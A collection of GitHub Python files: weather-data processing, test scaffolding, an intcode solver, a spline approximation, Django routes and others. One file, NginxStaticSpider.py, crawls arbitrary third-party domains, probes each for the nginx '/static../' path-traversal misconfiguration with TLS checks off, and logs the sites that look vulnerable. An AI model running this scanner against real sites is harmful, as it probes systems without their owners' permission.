+{"seq_id":"2747250367","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 2 18:34:18 2020\n\n@author: yiye\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport os\nimport csv\nimport pickle\n\n# Pre-detrend control\nisdetrend = False\n\nstation_coordinate = pd.DataFrame(np.zeros(shape = (1218, 3)), columns=['ID', 'lat', 'long'])\nwith open('Weather data/stations.txt', 'r') as fd:\n reader = csv.reader(fd)\n for s, row in enumerate(reader):\n station_coordinate.iloc[s,0] = row[0][:11]\n station_coordinate.iloc[s,1] = float(row[0][12:20])\n station_coordinate.iloc[s,2] = float(row[0][21:30])\nstation_coordinate.sort_values(by='ID', inplace = True)\n\neff_yr = []\nwith open('Weather data/tmin/' + 'USH00011084.FLs.52j.tmin', 'r') as fd:\n reader = csv.reader(fd)\n for y, row in enumerate(reader):\n if y in range(3): continue\n eff_yr.append(row[0][12:16])\nT = 127*12-1\n\nstation_list_tmin = os.listdir('Weather data/tmin/')\nstation_list_tmin.remove('.DS_Store')\nstation_list_tmin.sort()\ntmin = np.zeros(shape = (1218, T)) \nfor i, station in enumerate(station_list_tmin):\n #if station[5:7] != '04': continue # take the stations of california\n with open('Weather data/tmin/' + station, 'r') as fd:\n reader = csv.reader(fd)\n table = np.zeros(shape = (127, 12))\n y = 0\n for row in reader:\n if row[0][12:16] not in eff_yr: continue\n if row[0][12:16] != eff_yr[y]: \n table[:,:] = np.nan\n break\n for m in range(12):\n table[y, m] = int(row[0][(17+9*m-1):(17+9*m+5)])/100\n y += 1\n a = table.copy()\n table[table == -99.99] = np.nan\n if isdetrend: table -= np.nanmean(table,axis = 0) # detrend using monthly trends \n tmin[i,:] = table.flatten()[:-1]\nstd_tmin = np.nanstd(tmin, axis = 1)\n\n\nstation_list_tmax = os.listdir('Weather data/tmax/')\nstation_list_tmax.sort()\ntmax = np.zeros(shape = (1218, T)) \nfor i, station in enumerate(station_list_tmax):\n #if station[5:7] != '04': continue # take the stations of california\n with open('Weather data/tmax/' + station, 'r') as fd:\n reader = csv.reader(fd)\n table = np.zeros(shape = (127, 12))\n y = 0\n for row in reader:\n if row[0][12:16] not in eff_yr: continue\n if row[0][12:16] != eff_yr[y]: \n table[:,:] = np.nan\n break\n for m in range(12):\n table[y, m] = int(row[0][(17+9*m-1):(17+9*m+5)])/100\n y += 1\n table[table == -99.99] = np.nan\n if isdetrend: table -= np.nanmean(table,axis = 0) \n tmax[i,:] = table.flatten()[:-1]\nstd_tmax = np.nanstd(tmax, axis = 1)\n\n \nstation_list_tavg = os.listdir('Weather data/tavg/')\nstation_list_tavg.sort()\ntavg = np.zeros(shape = (1218, T)) \nfor i, station in enumerate(station_list_tavg):\n #if station[5:7] != '04': continue # take the stations of california\n with open('Weather data/tavg/' + station, 'r') as fd:\n reader = csv.reader(fd)\n table = np.zeros(shape = (127, 12))\n y = 0\n for row in reader:\n if row[0][12:16] not in eff_yr: continue\n if row[0][12:16] != eff_yr[y]: \n table[:,:] = np.nan\n break\n for m in range(12):\n table[y, m] = int(row[0][(17+9*m-1):(17+9*m+5)])/100\n y += 1\n table[table == -99.99] = np.nan\n if isdetrend: table -= np.nanmean(table,axis = 0) \n tavg[i,:] = table.flatten()[:-1]\nstd_tavg = np.nanstd(tavg, axis = 1)\n\n\nstation_list_prcp = os.listdir('Weather data/prcp/')\nstation_list_prcp.sort()\nprcp = np.zeros(shape = (1218, T)) \nfor i, station in enumerate(station_list_prcp):\n #if station[5:7] != '04': continue # take the stations of california\n with open('Weather data/prcp/' + station, 'r') as fd:\n reader = csv.reader(fd)\n table = np.zeros(shape = (127, 12))\n y = 0\n for row in reader:\n if row[0][12:16] not in eff_yr: continue\n if row[0][12:16] != eff_yr[y]: \n table[:,:] = np.nan\n break\n for m in range(12):\n table[y, m] = int(row[0][(17+9*m-1):(17+9*m+5)])/100\n y += 1\n table[table == -99.99] = np.nan\n if isdetrend: table -= np.nanmean(table,axis = 0) \n prcp[i,:] = table.flatten()[:-1]\nstd_prcp = np.nanstd(prcp, axis = 1)\n\n\na = ~np.isnan(tmin).any(axis=1)\nb = ~np.isnan(tmax).any(axis=1)\nc = ~np.isnan(tavg).any(axis=1)\nd = ~np.isnan(prcp).any(axis=1)\n\neff_station = a*b*c*d\n\n# Take California No.04 and Nevada No.26\nind04 = [i for i, x in enumerate(station_list_tmin) if eff_station[i] and x[5:7] == '04']\nind26 = [i for i, x in enumerate(station_list_tmin) if eff_station[i] and x[5:7] == '26']\nstation_name = [x for i, x in enumerate(station_list_tmin) if i in (ind04 + ind26)]\n \nind = ind04 + ind26\n\ndt_MTS = np.zeros(shape = (len(ind), 4, T)) \nfor t in range(T):\n dt_MTS[:, 0, t] = tmin[ind, t]\n dt_MTS[:, 1, t] = tmax[ind, t]\n dt_MTS[:, 2, t] = tavg[ind, t]\n dt_MTS[:, 3, t] = prcp[ind, t]\n\nwith open('dt_MTS_04_26','wb') as fp:\n pickle.dump((dt_MTS, ind),fp)\n \n \n#dt_MTS = np.zeros(shape = (len(ind), 4, T)) \n#for t in range(T):\n# dt_MTS[:, 0, t] = tmin[ind, t]/std_tmin[ind]\n# dt_MTS[:, 1, t] = tmax[ind, t]/std_tmax[ind]\n# dt_MTS[:, 2, t] = tavg[ind, t]/std_tavg[ind]\n# dt_MTS[:, 3, t] = prcp[ind, t]/std_prcp[ind]\n ","repo_name":"yiyej/Online_GL_matrix-valued_time_series","sub_path":"weather_data.py","file_name":"weather_data.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17533822656","text":"from __future__ import print_function\n\nimport json\nimport os\nimport sys\nimport time\nimport unittest\n\nfrom config import ConfigOpts\nfrom pywbem import *\n\n\nclass BaseTestCase(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Run before each test method to initialize test environment.\"\"\"\n super(BaseTestCase, self).setUp()\n \n print(\"======================================================================\")\n print(\"[Test Case] %s\" % self._testMethodName)\n \n self.start = time.time()\n \n self.config = ConfigOpts()\n self.config.setup()\n \n self.conn = WBEMConnection(self.config.url, creds=(self.config.userid, self.config.password), default_namespace=self.config.namespace)\n\n def tearDown(self):\n super(BaseTestCase, self).tearDown()\n \n end = time.time()\n msg = ('[Test Case] end, taking %s seconds.' % (\"%.1f\" % (end - self.start)))\n print(msg)\n \n def dump(self, obj):\n for attr in dir(obj):\n print ('obj.%s = %s' % (attr, getattr(obj, attr)))\n \ndef main():\n unittest.main()\n","repo_name":"zhaoeryi/ironic-testing","sub_path":"ironic-testing/tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20800313740","text":"import pylab as plt\nfrom audiolazy import wsymm # Try using \"window\" instead of wsymm\n\nsize = 256\n\nfor func in wsymm:\n plt.plot(func(size), label=func.__name__)\n\nplt.legend(loc=\"best\")\nplt.axis(xmin=-5, xmax=size + 5 - 1, ymin=-.05, ymax=1.05)\nplt.title(\"AudioLazy windows for size of {} samples\".format(size))\nplt.tight_layout()\nplt.ioff()\nplt.show()\n","repo_name":"danilobellini/audiolazy","sub_path":"examples/windows_plot.py","file_name":"windows_plot.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":671,"dataset":"github-code","pt":"69"}
+{"seq_id":"33023977709","text":"#! python 3\n# phoneAndEmail.py - Finds phone numbers and email addresses on the clipboard\n\nimport pyperclip\nimport re\n\n\n# Regex for phone numbers (American)\n\nphoneRegex = re.compile(r'''(\n (\\d{3}|\\(\\d{3}\\))? # area code\n (\\s|-|\\.)? # separator\n (\\d{3}) # first 3 digits\n (\\s|-|\\.) # separator\n (\\d{4}) # last 4 digits\n (\\s*(ext|x|ext.)\\s*(\\d{2,5}))? # extension\n)''', re.VERBOSE)\n\n\n# Regex for email address\n\nemailRegex = re.compile(r'''\n [a-zA-Z0-9._%+-]+ # username\n @ # @ symbol\n [a-zA-Z0-9.-]+ # domain name\n \\.[a-zA-Z]{2,4} # dot-something\n ''', re.VERBOSE)\n\n# find matches in clipboard text (from website or any page that may contain #'s and emails)\ntext = str(pyperclip.paste())\nmatches = []\nfor groups in phoneRegex.findall(text):\n phoneNum = '-'.join([groups[1], groups[3], groups[5]])\n if groups[8] != '':\n phoneNum += 'x' + groups[8]\n matches.append(phoneNum)\n\nfor groups in emailRegex.findall(text):\n matches.append(groups)\n\n\n# Copy results to clipboard\n\nif len(matches) > 0:\n pyperclip.copy('\\n'.join(matches))\n print('Copied to clipboard:')\n print('\\n'.join(matches))\nelse:\n print(\"No email address or phone number matches found!\")\n","repo_name":"cabmeron/Automate-Boring-Stuff-With-Python","sub_path":"Pattern-Matching-With-Regular-Expressions/phoneAndEmail_string_extractor/phoneAndEmail.py","file_name":"phoneAndEmail.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30300699720","text":"from django.urls import path\nfrom AppTecno import views\n\nfrom django.contrib.auth.views import LogoutView\n\nurlpatterns = [\n#inicio de la app\npath('tecnologia', views.tecnologia, name=\"Tecnologia\"),\n\n#Urls laptops\npath('laptopRegistro',views.laptopRegistro, name=\"LaptopRegistro\"),\npath('leerLaptops',views.leerLaptops,name=\"LeerLaptops\"),\npath('eliminarLaptop//',views.eliminaLaptop,name=\"EliminarLaptop\"),\npath('modificarLaptop//',views.modificarLaptop,name=\"ModificarLaptop\"),\npath('buscarLaptop/', views.buscarLaptop),\n#Urls Views laptop\npath('laptops',views.Laptoplist.as_view(),name='Laptops'),\npath(r'^nuevo$', views.LaptopCreacion.as_view(), name='New'),\npath(r'^editar/(?P\\d+)$', views.LaptopModificar.as_view(), name='Edit'),\npath(r'^borrar/(?P\\d+)$', views.LaptopEliminar.as_view(), name='Delete'),\n\n#Urls Celulares\npath('celularesRegistro',views.celularesRegistro, name=\"CelularesRegistro\"),\npath('leerCelulares',views.leerCelulares,name=\"LeerCelulares\"),\npath(r'^editarCel/(?P\\d+)$', views.CelularModificar.as_view(), name='EditCel'),\npath('eliminarCelular//',views.eliminaCelular,name=\"EliminarCelular\"),\npath('buscarCelular/', views.buscarCelular),\n\n#Urls Televisores\npath('televisoresRegistro',views.televisoresRegistro, name=\"TelevisoresRegistro\"),\npath('leerTelevisores',views.leerTelevisores,name=\"LeerTelevisores\"),\npath(r'^editarTel/(?P\\d+)$', views.TelevisorModificar.as_view(), name='EditTel'),\npath('eliminarTelevisor//',views.eliminaTelevisor,name=\"EliminarTelevisor\"),\npath('buscarTelevisor/', views.buscarTelevisor),\n]\n","repo_name":"Alexander9122/ProyectoFinalCoder","sub_path":"WebVentas/AppTecno/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"36048589623","text":"\"\"\"\n07\n\"\"\"\nimport itertools\n\nfrom egc.computer import ElfGuidanceComputer\nfrom utils.solver import ProblemSolver\n\n\nclass Day07ElfGuidanceComputer(ElfGuidanceComputer):\n def __init__(self, ampID, *args, **kwargs):\n super(Day07ElfGuidanceComputer, self).__init__(*args, **kwargs)\n self.ampID = ampID\n self.inputCounter = -1\n self.phase = -1\n self.input = 0\n self.output = 0\n\n def _store(self):\n \"\"\"\n Stores the result of the computer's GetInput function and stores its value at the position specified\n\n :returns int: The number of parameters used in the instruction\n \"\"\"\n value = self.GetInput()\n if value is not False:\n self._setValueForParameter(0, value)\n\n return 2\n\n return 0\n\n def GetInput(self):\n \"\"\"\n Get the current phase setting, a value between 0 and 4\n\n :return: The phase setting of this computer, if valid\n \"\"\"\n self.inputCounter += 1\n\n # if it's the first input call, grab the phase setting\n if self.inputCounter == 0:\n return self.phase\n else:\n return self.input\n\n\nclass Day07ConcurrentComputer(Day07ElfGuidanceComputer):\n def __init__(self, *args, **kwargs):\n super(Day07ConcurrentComputer, self).__init__(*args, **kwargs)\n self.paused = False\n self.next = -1\n self.input = False\n self.paused = False\n\n @property\n def input(self):\n return self._input\n\n @input.setter\n def input(self, value):\n self._input = value\n self.paused = False\n\n def step(self):\n super(Day07ConcurrentComputer, self).step()\n #print(self.ampID, self.currentIndex, self.buffer)\n\n def GetInput(self):\n self.inputCounter += 1\n # if we don't have an input signal, pause\n if self.input is False:\n self.paused = True\n return False\n\n if self.inputCounter > 0:\n output = self.input\n self.input = False\n return output\n else:\n return self.phase\n\n def Output(self, value):\n \"\"\"\n On output, pause execution until we recieve a new input signal\n\n :param value:\n \"\"\"\n super(Day07ConcurrentComputer, self).Output(value)\n\n def RunUntilOutput(self):\n while not self.paused and not self.finished:\n self.step()\n\n\nclass DaySolver07(ProblemSolver):\n def __init__(self):\n super(DaySolver07, self).__init__(7)\n\n self.testDataPartOne = {('3,15,3,16,1002,16,10,16,1,16,15,15,4,15,99,0,0', '43210'): 43210,\n ('3,23,3,24,1002,24,10,24,1002,23,-1,23,101,5,23,23,1,24,23,23,4,23,99,0,0', '01234'): 54321,\n ('3,31,3,32,1002,32,10,32,1001,31,-2,31,1007,31,0,33,1002,33,7,33,1,33,31,31,1,32,31,31,4,31,99,0,0,0','10432'): 65210}\n self.testDataPartTwo = {('3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5', '98765'): 139629729,\n ('3,52,1001,52,-5,52,3,53,1,52,56,54,1007,54,5,55,1005,55,26,1001,54,-5,54,1105,1,12,1,53,54,53,1008,54,0,55,1001,55,1,55,2,53,55,53,4,53,1001,56,-1,56,1005,56,6,99,0,0,0,0,10', '97856'): 18216\n }\n\n self.amplifierIDs = ['a', 'b', 'c', 'd', 'e']\n self.nextAmplifier = {'a':'b',\n 'b':'c',\n 'c':'d',\n 'd':'e',\n 'e':'a'}\n self.phases = [0, 1, 2, 3, 4]\n\n def ProcessInput(self, data=None):\n \"\"\"\n :param str data: comma-separated integers\n\n :returns list[int]: the intcode buffer\n \"\"\"\n if not data:\n data = self.rawData\n\n processed = [int(i) for i in data.split(',')]\n\n return processed\n\n def _initializeAmplifiers(self, data, amplifierClass=Day07ElfGuidanceComputer):\n \"\"\"\n\n :return dict: the initialized amplifier computers mapped to str ids\n \"\"\"\n return {amp: amplifierClass(amp, data.copy()) for amp in self.amplifierIDs}\n\n def TestAlgorithm(self, algorithm, part=1):\n \"\"\"\n Override the algorithm testing method so we can customize\n how we handle input data for testing part 1\n\n :param func algorithm: the algorithm to test\n :param int part: the part of the day we 're testing\n\n :return bool: if we succeeded\n \"\"\"\n if part == 2:\n for test, expectedResult in self.testDataPartTwo.items():\n data, phaseOrder = test\n\n processed = self.ProcessInput(data=data)\n phaseOrder = [int(i) for i in phaseOrder]\n\n amplifiers = self._initializeAmplifiers(processed, amplifierClass=Day07ConcurrentComputer)\n\n result = self.testPhaseOrderConcurrent(amplifiers, phaseOrder)\n\n if result != expectedResult:\n raise Exception(\"Test on Part2 data {} returned result {}\".format(test, result))\n\n else:\n for test, expectedResult in self.testDataPartOne.items():\n data, phaseOrder = test\n\n processed = self.ProcessInput(data=data)\n phaseOrder = [int(i) for i in phaseOrder]\n\n amplifiers = self._initializeAmplifiers(processed)\n\n result = self.testPhaseOrder(amplifiers, phaseOrder)\n\n if result != expectedResult:\n raise Exception(\"Test on data {} returned result {}\".format(test, result))\n\n return True\n\n def testPhaseOrder(self, amplifiers, phaseOrder):\n \"\"\"\n Test the given amplifier buffer based on the input phaseOrder values\n\n :param dict amplifiers:\n :param list phaseOrder:\n\n :return int: the output buffer of amplifier e\n \"\"\"\n amplifiers = amplifiers.copy()\n\n for i, value in enumerate(self.amplifierIDs):\n amplifiers[value].phase = phaseOrder[i]\n\n amplifiers['a'].input = 0\n\n for i, value in enumerate(self.amplifierIDs):\n amplifiers[value].Run()\n\n if i + 1 < len(self.amplifierIDs):\n amplifiers[self.amplifierIDs[i + 1]].input = amplifiers[value].output\n\n return amplifiers['e'].output\n\n def testPhaseOrderConcurrent(self, amplifiers, phaseOrder):\n amplifiers = amplifiers.copy()\n\n # tell the amplifiers who to talk to next\n for amp in amplifiers:\n amplifiers[amp].next = self.nextAmplifier[amp]\n\n # populate the input buffer with the phase of the amplifier to start\n for i, value in enumerate(self.amplifierIDs):\n amplifiers[value].phase = phaseOrder[i]\n\n # pre-populate the second input of the 'a' amplifier\n amplifiers['a'].input = 0\n\n allFinished = False\n\n while not allFinished:\n for ampID, amplifier in amplifiers.items():\n #print(ampID)\n if not amplifier.finished:\n amplifier.RunUntilOutput()\n\n amplifiers[amplifier.next].input = amplifier.output\n\n allFinished = all([amplifier.finished for amplifier in amplifiers.values()])\n\n return amplifiers['e'].output\n\n def SolvePartOne(self, data=None):\n \"\"\"\n :param list data: the data to operate on\n \n :return : the result\n \"\"\"\n self.phases = [0, 1, 2, 3, 4]\n\n if not data:\n data = self.processed\n\n phaseOrderPermutations = itertools.permutations(self.phases, len(self.phases))\n\n results = []\n\n for phaseOrder in phaseOrderPermutations:\n amplifiers = self._initializeAmplifiers(data)\n results.append(self.testPhaseOrder(amplifiers, list(phaseOrder)))\n\n return max(results)\n\n def SolvePartTwo(self, data=None):\n \"\"\"\n :param list data: the data to operate on\n \n :return : the result\n \"\"\"\n self.phases = [5, 6, 7, 8, 9]\n\n if not data:\n data = self.processed\n\n phaseOrderPermutations = itertools.permutations(self.phases, len(self.phases))\n\n results = []\n\n for phaseOrder in phaseOrderPermutations:\n amplifiers = self._initializeAmplifiers(data, amplifierClass=Day07ConcurrentComputer)\n results.append(self.testPhaseOrderConcurrent(amplifiers, list(phaseOrder)))\n\n return max(results)\n\n\ndef Main():\n solver = DaySolver07()\n solver.Run()\n\n\nif __name__ == '__main__':\n Main()\n","repo_name":"ozzmeister00/AdventOfCode2019","sub_path":"day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":8612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18330089430","text":"from functools import wraps\nimport time\nfrom typing import Callable, Tuple, Dict\n\n\ndef elapsed_time(f: Callable):\n @wraps\n def wrapper(*args, **kargs):\n st = time.time()\n v = f(*args, **kargs)\n print(f\"{f.__name__} {time.time()-st}\")\n return v\n return wrapper\n\n\n@elapsed_time\ndef normal_pow(x: float, n: int) -> float:\n p = x\n for _ in range(n):\n p *= x\n return p\n\n\n@elapsed_time\ndef dp_pow(x: float, n: int) -> float:\n \"\"\"\n calculate exponationation of x with dynamic programing ,which require O(log(n)) time\n Parameters\n ----------\n x : float\n [description]\n n : int\n [description]\n\n Returns\n -------\n float\n [description]\n \"\"\"\n\n if n == 1:\n return x\n if n % 2 == 0:\n p = dp_pow(x, n/2)\n return p*p\n else:\n p = dp_pow(x, (n-1)/2)\n return x*p*p\n\n\nif __name__ == \"__main__\":\n import time\n st = time.time()\n normal_pow(4, 100000)\n print(time.time()-st)\n st = time.time()\n dp_pow(4, 100000)\n print(time.time()-st)\n # 500 times faster than normal pow\n","repo_name":"owari-taro/python_algorithm","sub_path":"algirthm_and_data_structure/chap8_algorithm_design/dp_pow.py","file_name":"dp_pow.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31288083046","text":"import re\nfrom datetime import datetime\n\nimport pdfminer.high_level\n\nimport categories\nfrom mail_api.abstract_mail_api import AbstractAttachment\nfrom message_handler import MessageHandler\nfrom utils import temporary_locale\n\n\nclass MoisesMessageHandler(MessageHandler):\n def get_type(self):\n return categories.COMPUTER_SOFTWARE\n\n def get_query_params(self):\n return {\n self.SUBJECT: \"Your receipt from Moises Systems, Inc.\",\n self.SENDER: \"Moises Systems, Inc.\",\n }\n\n def extract_txt(self, pdffile: str):\n text = pdfminer.high_level.extract_text(pdffile)\n purchase_date = re.findall(r\"([A-Za-z]+ \\d+, \\d{4})\", text)[0]\n with temporary_locale(\n \"en_US\"\n ): # required for parsing the date with English month names\n self.purchase_date = datetime.strptime(purchase_date, \"%B %d, %Y\")\n self.amount = float(\n re.findall(r\"Amount paid.*\\$(\\d+\\.\\d+)\", text, re.DOTALL)[0]\n )\n self.my_currency = \"USD\"\n\n def handle_attachment(self, attachment: AbstractAttachment):\n if re.search(r\"Invoice-\", attachment.get_filename()):\n return True\n pdffile: str = self.save(attachment)\n self.filename = attachment.get_filename()\n self.extract_txt(pdffile)\n","repo_name":"bwagner/gi","sub_path":"plugins/moises_message_handler.py","file_name":"moises_message_handler.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31433582456","text":"from urllib.parse import urlparse\n\nimport requests\nimport scrapy\n\n\nclass GitSpider(scrapy.Spider):\n name = 'NginxStaticSpider'\n\n allowed_schemes = [\n 'http',\n 'https'\n ]\n\n disallowed_tlds = [\n 'com',\n 'net'\n ]\n\n def __init__(self, **kwargs):\n super().__init__(self.name, **kwargs)\n\n if not hasattr(self, 'url'):\n raise Exception('No url argument provided!')\n\n starting_url = self.url\n\n if not starting_url.startswith('http://') and not starting_url.startswith('https://'):\n starting_url = 'https://' + starting_url\n\n print('Starting url: %s' % starting_url)\n\n self.start_urls = ['%s' % starting_url]\n\n def parse(self, response):\n # print('Response URL: %s' % response.url)\n\n parsed_root_url = urlparse(response.url)\n\n self.check_for_vulnerability('%s://%s' % (parsed_root_url.scheme, parsed_root_url.netloc), response.headers)\n\n for url in response.xpath('//a/@href').extract():\n parsed_url = urlparse(url)\n\n if len(parsed_url.scheme) == 0 or len(parsed_url.netloc) == 0:\n continue\n\n if parsed_root_url.netloc is parsed_url.netloc:\n continue\n\n if parsed_url.scheme not in self.allowed_schemes:\n continue\n\n domain = parsed_url.netloc\n domains = domain.split('.')\n\n tld = domains[len(domains) - 1]\n\n if tld in self.disallowed_tlds:\n continue\n\n if len(domains) != 2:\n domain = '%s.%s' % (domains[len(domains) - 2], domains[len(domains) - 1])\n\n url = '%s://%s' % (parsed_url.scheme, domain)\n\n yield scrapy.Request(url, callback=self.parse)\n\n def check_for_vulnerability(self, url, headers):\n if not self.is_nginx(headers):\n return\n\n # response = requests.get('%s/static/' % url, verify=False)\n #\n # if response.status_code != 200:\n # if response.status_code != 404:\n # print('Response code wrong: %d %s' % (response.status_code, url))\n # return\n\n response = requests.get('%s/static../' % url, verify=False)\n\n if response.status_code == 403:\n print('[+] Possible found: %s' % url)\n self.log_possible_found(url, response)\n # else:\n # print('[-] Not found: %s' % url)\n\n @staticmethod\n def log_possible_found(url, response):\n f = open('out/found.txt', 'a+')\n f.write('%s\\n' % url)\n f.close()\n\n filename = 'out/%s' % url.replace(':', '_').replace('//', '')\n\n f = open(filename, 'w+')\n f.write(response.content.decode('UTF-8'))\n f.close()\n\n @staticmethod\n def is_nginx(headers):\n server = None\n\n if 'Server' in headers:\n server = headers['Server']\n elif 'server' in headers:\n server = headers['server']\n\n # it can be false positive\n if server is None:\n return True\n\n server = server.decode('utf-8').lower()\n\n return 'nginx' in server","repo_name":"adamtorok96/NginxStaticSpider","sub_path":"NginxStaticSpider.py","file_name":"NginxStaticSpider.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17823966052","text":"import discrete_minmax\nimport math\n\ndef getError(result):\n iterations = len(result)\n error = result[str(iterations)][\"max_error\"]\n return abs(error)\n\n\ndef shrinkInterval(interval, history = []):\n [start, end] = interval\n\n if end - start == 1:\n return [start, end]\n\n if (start > end):\n print('Beginning of interval is greater than its end')\n return\n left_boundaries = sorted(filter(lambda x: x < end, map(lambda x: x[1], history)))\n if len(left_boundaries) > 0:\n nearest_left_neighbor = left_boundaries[-1]\n delta = math.ceil((end - nearest_left_neighbor) / 2.0)\n return [int(start), int(end - delta)]\n else:\n mid = math.ceil((end - start) / 2.0)\n return [int(start), int(start + mid)]\n\n\ndef expandInterval(interval, history):\n [start, end] = interval\n if (start > end):\n print('Begining of interval is greater than its end')\n return\n if len(history) == 0:\n print('when expanding there should be history')\n return\n\n right_boundaries = sorted(filter(lambda x: x > end, map(lambda x: x[1], history)))\n if len(right_boundaries) > 0:\n nearest_right_neighbor = right_boundaries[0]\n delta = math.ceil((nearest_right_neighbor - end) / 2.0)\n return [int(start), int(end + delta)]\n\n\ndef main(X, Y, deg, pinnedPoints, allowed_error, *args):\n # return discrete_minmax.main(X, Y, deg, pinnedPoints)\n\n interval = [0, len(X) - 1]\n historyOfIntervals = []\n splines = []\n\n def approximateMinmax(interval):\n if type(interval) is list:\n [start, end] = interval\n x_shrinked = X[start:end+1]\n y_shrinked = Y[start:end + 1]\n return discrete_minmax.main(x_shrinked, y_shrinked, deg, pinnedPoints)\n\n approximate = args[0] if len(args) > 0 else approximateMinmax\n\n def make_approximation_on_one_segment(overallInterval):\n print('overallInterval')\n print(overallInterval)\n if not type(overallInterval) is list:\n print(overallInterval)\n return\n result = approximate(overallInterval)\n max_error = getError(result)\n\n condition = abs(abs(max_error) - allowed_error)\n points = overallInterval[-1] - overallInterval[0] + 1\n\n if condition > (allowed_error / 10) and points > deg + 2: # WHY 10 ????\n\n if (max_error > allowed_error):\n shrinkedInterval = shrinkInterval(overallInterval, historyOfIntervals)\n if len(historyOfIntervals) == 0:\n historyOfIntervals.append(overallInterval)\n historyOfIntervals.append(shrinkedInterval)\n make_approximation_on_one_segment(shrinkedInterval)\n else:\n if overallInterval[1] != interval[1]:\n expandedInterval = expandInterval(overallInterval, historyOfIntervals)\n historyOfIntervals.append(expandedInterval)\n make_approximation_on_one_segment(expandedInterval)\n else:\n splines.append({\n \"interval\": overallInterval,\n \"spline\": result,\n \"max_error\": max_error\n })\n else:\n splines.append({\n \"interval\": overallInterval,\n \"spline\": result,\n \"max_error\": max_error\n })\n if overallInterval[1] < interval[1]:\n historyOfIntervals[:] = []\n make_approximation_on_one_segment([overallInterval[1], interval[1]])\n\n make_approximation_on_one_segment(interval)\n return splines\n\nX = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]\nY = [1.1, 0.9, 3.2, 4.5, 5.6, 6.7, 7.5, 8.4, 9.2, 10.2, 11.3, 12.4, 13.5, 14.1]\ndeg = 1\npinnedPoints = []\n\n\n# print(len(main(X, Y, deg, pinnedPoints, 0.2)))\n# mid_index = int(math.floor(len(X) / 2.0))\n#\n#\n# print(mid_index)\n#\n#\n# left_X = X[:mid_index]\n# right_X = X[mid_index:]\n#\n# left_Y = Y[:mid_index]\n# right_Y = Y[mid_index:]\n\n# print(left_X)\n# print(right_X)\n\n# print(main(X, Y, deg, pinnedPoints)['1']['max_error'])\n\n# def getMaxError (X, Y, deg, pinnedPoints):\n# approx = main(X, Y, deg, pinnedPoints)\n# iterations = list(map(lambda x: int(x), approx.keys()))\n# last_index = max(iterations)\n# print(approx[str(last_index)]['max_error'])\n\n# getMaxError(X, Y, deg, pinnedPoints)\n#\n# getMaxError(left_X, left_Y, deg, pinnedPoints)\n#\n# getMaxError(right_X, right_Y, deg, pinnedPoints)\n#\n\n","repo_name":"blevantovych/Diplom","sub_path":"server/discrete_spline_minmax.py","file_name":"discrete_spline_minmax.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"40634964299","text":"d = dict()\ndef separador(a):\n b = a.split()\n return b[2]\n\ndef hola(manejador):\n\n for linea in manejador:\n if len(linea.split()) == 0 or linea.split()[0] != 'Received:':\n \n continue\n d[separador(linea)] = d.get(separador(linea),0)+1\n #print (linea)\n\n\nhola(open(\"actividad7/mbox-short.txt\"))\nprint(d)","repo_name":"idril150/mango","sub_path":"actividad8/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"7472714242","text":"# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def removeElements(self, head, val):\r\n \"\"\"\r\n :type head: ListNode\r\n :type val: int\r\n :rtype: ListNode\r\n \"\"\"\r\n ###first remove val if they exist in the start of the list\r\n ###then propogate\r\n if head==None:return head\r\n while head.val==val:\r\n head=head.next\r\n if head==None:return head\r\n p1=head;p2=p1.next\r\n while p2!=None:\r\n if p2.val==val:\r\n p2=p2.next\r\n p1.next=p2\r\n else:\r\n p1=p2;\r\n p2=p1.next\r\n return head","repo_name":"cclain/LeetCode-Problem-Solution","sub_path":"203. Remove Linked List Elements.py","file_name":"203. Remove Linked List Elements.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
